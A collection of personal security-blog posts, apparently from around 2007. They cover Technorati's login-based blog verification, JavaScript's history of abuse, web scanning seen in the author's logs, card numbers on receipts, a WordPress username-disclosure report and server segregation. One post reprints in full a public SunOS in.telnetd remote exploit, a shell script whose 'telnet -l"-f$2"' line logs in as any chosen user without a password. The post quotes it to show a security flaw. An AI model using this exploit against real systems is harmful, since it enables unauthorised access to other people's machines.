Gilbert Verdian - Security Advocate

As I’m required to write this post to verify my blog using the traditional “Post Claim”, thought I might as well talk a little about it.

In setting up my blog in technorati, they have a new option to do a “Quick Claim” to prove that you own this blog. This entails to give them your username and password to wordpress to log in and verify the blog. But don’t worry..

Note: Remember to use the username and password for your WordPress account, not your Technorati account. This will only be used once to verify that you own the blog. It will not be stored in our system.

Does anyone else see the problem with this? Here you go, here’s my wordpress login and password. Although it’s not “stored” in their system according to technorati, the details you input would have to be placed somewhere on disk (in a db?) or at least memory for the bots to read it and try to login to verify things. So what happens after it is read?

I know other online services such as google analytics, require you to upload a specific text file to the root of your site with only a key in the contents, which they then do a GET /file1234.html to verify that you own the site. Surely this is a better way, although a little more technical work is needed.

I was thinking of the current situation we are experiencing in Web vulnerabilities specifically with scripting and javascript. So I searched to find the source of when our browsers started to incorporate javascript and found the following:

- Netscape 2.0 was the first version of Netscape to have javascript support – It was released in March 1996 http://wp.netscape.com/eng/mozilla/2.0/relnotes/windows-2.0.html
- “Netscape version 2.0 introduced a bevy of must-have breakthrough features (frames, Java, Javascript and Plug-ins) which helped distance it from the pack…”
http://www.eskimo.com/~bloo/indexdot/history/netscape.htm

The following slides have good background information on the javascript implementation:
http://www.geom.uiuc.edu/~slevy/si/u_pkg_java102/docs/javaone/industry/JavaScri.pdf

On the Internet Explorer side, it was IE 3.0 released August 1996 which incorporated javascript. Just as important, they also included VBScript.

“Version 3 included Internet Mail and News 1.0 and the Windows Address Book. It also brought the browser much closer to the bar that had been set by Netscape, including the support of Netscape’s plugins technology (NPAPI), ActiveX,frames, and a reverse-engineered version of JavaScript named JScript. Later, Microsoft NetMeeting and Windows Media Player were integrated into the product and thus helper applications became not as necessary as they once were. Cascading Style Sheets (CSS) were also introduced with version 3 of Internet Explorer.” - http://en.wikipedia.org/wiki/History_of_Internet_Explorer

It wasn’t long after this time where people found ways to abuse Javascript

[SCRIPT LANGUAGE="JavaScript"]

[/SCRIPT]

The above is a script from around that time which chews up CPU and memory, forcing you to do a hard reset in Windows 95.

And so over 10 years later, scripting which was designed to enhance our web experience, is still being abused today, but in much different ways that assist in monetary gain for malicious purposes.

Maybe its time we re-architect our browsers and re-think how we should experience the web all over again?

As a security professional, we spend our time helping our organisation and clients in securing their infrastructure, but what should we do when WE are scanned?

I’ve noticed in my logs numerous attempts using web applications scanners, the latest one run on the 21st June using acunetix. . As you know this adds quite a bit of unnecessary traffic to your site, especially when you turn all the options on in the scanner and it basically runs all the web tests against each file and directory on your server. The following is a snapshot of the difference in traffic from the scan.

As you can see jumping from under 1000 requests to over 130,000 is quite a big jump.

Also got some recon using Google “site:gilbertverdian.com php”.

By the way that IP is the transparent proxy from http://www.tpg.com.au, an Australian ISP. Seems users from that ISP have been a little naughty lately.

My setup is quite standard, hosted by dreamhost, running wordpress, with mysql db and a couple of wordpress plugins. If someone wants to really break in, all you have to do is easily set up a vmware LAMP server using linux and install wordress… emulate this environment and have a go against your virtual host. You might even gain some 0day credits if you find some bugs.

I know in the past of other security professionals having their own server broken into (not mentioning any names johnny because they didn’t patch ssh about 4 years ago), but he admitted in getting lazy and not patching an old version and moved on…

So the question stands, what do we do about it? Should we follow this up with the ISP? Or just let it go? What do you guys do?

Just came back from a trip to Scotland and before throwing a receipt away in the bin noticed that this one printed everything except the last 4 digits of the card whereas another receipt I had only contained the last 4 digits. Not good having these two receipts together.

Coincidently on digg last week the following story on WSJ explains how consumers are bringing class action lawsuits against large retailers for printing too many digits on receipts. The story states:

In the US,

as of Dec. 4, retailers are prohibited from printing more than the last five digits of a credit-card or debit-card account number on receipts that are handed to customers. The receipts also can’t include the account’s expiration date. The law applies only to electronically printed receipts, rather than those that are written by hand or imprinted on old-fashioned manual machines.

So you are now liable as a retailers for using a product that vendors fail to meet current laws and regulations, instead of the vendors of the point of sale systems themselves. Privacy is such a concern for consumers, as it should be, that we are doing anything in order to protect our personal data. Imagine this in another context, where a user of system is liable for a fault by the manufacturer/vendor.

So far “100 federal lawsuits seeking class-action status against big merchants such as Rite Aid Corp., Wendy’s International Inc., FedEx Corp., TJX Cos. and Inter Ikea Systems BV.”

The best case would if other countries adopted something similar as law or the requirement became part of PCI. This should be a catalyst for Point of Sale vendors to step up and address this insecurity or they themselves can also face legal liability the same way retailers are, we’ll just have to wait and see what happens in this space.

In my travels I am still amazed at how many point of sale systems around the world still print people’s full credit card and expiry number on the receipts.

Most usually X-out all the numbers except the last 4 digits and the expiry date, which is good but even so, do they really need to print the expiry aswell? Dumpster diving or sifting through people’s trash is quite a common method used for identity theft. This involves people sorting through your trash or looking through corporate dumpsters to find valuable information that can be used for malicious purposes. Many famous hacks in the past have involved finding system manuals, usernames & passwords, corporate directories all in the trash.

Imagine you have a letter from your bank with your new credit card, the letter only has your account number which is the new card number. You then go to the store, make a purchase and are given a receipt with only the last 4 digits of the number and the expiry date and finally you right down the CVV number on the back of a paper when you make an online purchase. All these documents go into the trash for trash day…

Now all someone has to do is find all of the above and they have your credit card details and your personal information, it’s about piecing together small amounts of information to get to the bigger picture.

Please take the time to check your receipts and papers you throw away no matter where you are and for best results, shred everything with a good quality shredder before it goes in the trash.

I overheard a conversation that put a smile on my face. A friend of a relative was talking to her about the internet and more specifically eBay, the tone changed very quickly as the first thing mentioned was how risky online transactions are.

“Oh, I never put any credit card details online, it’s not safe!” She later went on to inform everyone how it is important to have the “lock” on sites and how some friends were subject to some credit card fraud.

I also hear from many people how they have the latest antivirus and spyware on their machines. When I ask what they do to keep secure, non technical people are technically savvy, usually responding along the lines of “I have Norton Antivirus, run Adaware once a week (sometimes daily!) and now use Firefox instead of Internet Explorer”.

But why does it have to be this way? Imagine the same constructs on something we have in the physical world that is essential to us, our cars. For argument’s sake, on computers we are spending 80% of our time to fix and maintain it to be able to use it for the remaining 20%. Imaging doing the same on your car every day! You would have to get up very early, start tweaking the motor, change the oil, fix the brakes etc for 48mins, just to drive to work which is 12mins away… that is certainly something that no one will put up with. So why are we accepting this for our computers? To help out, I recommend people switch to Mac for their next machine just because they are not going to waste all that time fixing and maintaining it, they will just be able to get on with the work they intended to do in the first place.

Many of the converted have recommended that I go work at Apple as I do such a good job of selling it to them, or have asked if I DO work at Apple?… There was a head of security job going there about 2 years ago that I had a look at… Maybe sometime in the future if something similar came up?

It’s great to see an understanding being spread about the risks and protecting personal information online. Security education and awareness is quite an important factor in the security process to make things a little safer for people online.

Great job people!

Found a disclosure during authentication to a blog for version 2.1.2.

When a person logs in with the wrong username into /wp-admin, the error message states “ERROR: Incorrect username”.

Whereas if you put enter the correct username and the wrong password, you get the following.

The problem is that Wordpress is disclosing that that username doesn’t exist, therefore providing more information to someone who wants to bruteforce username/password combinations. Once they’ve guessed a correct username (other than the default admin), they only have 1 field to bruteforce reducing the time needed.

The solution should say “ERROR: Incorrect username/password” to not disclose which one was incorrect.

Wordpress.org was notified on the 8th March via wordpress.org/support and security@wordpress.org.

Sometimes security is ignored due to timelines, money, politics etc… I recently had to explain why having different web functions on the one physical box is a bad idea…

- Good security practice recommends separating and segregating different functions, especially in a web environment, to different systems
- Being on different systems, access can be controlled on what is allowed to pass through to each system through firewalls.
- for example, the application server running middleware only needs to talk to the database server on sql ports to run queries
- therefore controls can be put in place on each of the systems which should be separated by firewalls on how and what is accessed.
- Assumptions should be made that each server should be sacrificed in a worse case scenario. Meaning it should be assumed that a server will be compromised. If this is taken into consideration, then we have to limit the damage of the impact of the server. If set up correctly as described above, then if one server is compromised, then attackers will only have access to the one server. But in the case of all the web functions being put on the same server, if there is a vulnerability in just one of those functions, then they have access to all the data in each of the functions. This is also the same for servers that are physically or logically placed on the same network without any controls to restrict their access.
- The final risk is that of the underlying operating system. If there is a vulnerability in the OS of the server, then again attackers will be able to access the data stored in each of the functions of the web systems.

This is a serious overlook in something so trivial. Just check out this publicly released code on packetstorm and how little is needed to become any user on that system!
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo “./sunos ”
echo “./sunos localhost bin”
exit
fi
echo “”
echo “ALEX ALEX”
echo “”
telnet -l”-f$2″ $1


The telnet daemon in.telnetd, especially the solaris/sunos one, has had quite a number of problems in the past, here’s an old exploit relating to a problem with TTYPROMPT, systems vulnerable are SunOS 5.5, 5.5.1, 5.6, 5.7, 5.8.

This new vulnerability is very similiar to the old one where an environment variable was the problem. Usually in such cases, they contain quite a large number of characters, so when a user logs in using telnet, those variables are read, thus overflowing the buffer and usually they contain some shellcode to execute code when this occurs.

These days, telnet is seldom used for unix logins, usually ssh is preferred because of its extra security settings and encryption, although telnet is still around on network devices such as routers or switches which don’t support ssh.

A researcher at Symantec today announced new threats against broadband routers.

This involves malicious users remotely logging into the router, changing the dns settings and thus redirecting users to fake sites to steal user information. This is not a new thing and this threat has been around for quite a while, it is about guessing passwords to obtain access to systems. No matter how much security is in place, a small mistake or an overlook by a user can compromise everything in place.

Just have a look at Phenoelit’s Default Password List and find your device on the list.

To protect against this threat:
- ALWAYS change the default username and password to something other than “admin, password”.
- Never turn on remote management on the router - home users really don’t need to do this
- Disallow the device responding to pings - hiding is good and your connection won’t come up in a ping sweep when people are searching for easy targets.

Something for vendors, maybe you can put in a blank initial password for the first time setup which then forces the user to change it part of the process, disable responding to pings and turn off remote management ports. To make it more complex:
- block all incoming ports on the “stateful” firewall for tcp, udp, icmp etc
- implement a fake tcp stack fingerprint - if someone scans you and sees you’ve identified yourself as an obscure piece of old networking equipment which they’ve never heard, they’re going to leave you alone
- implement basic IPS capabilities to detect common attacks and block them accordingly. A portscan from anyone against a router should implement an automatic firewall rule to block that ip.

Something to think about…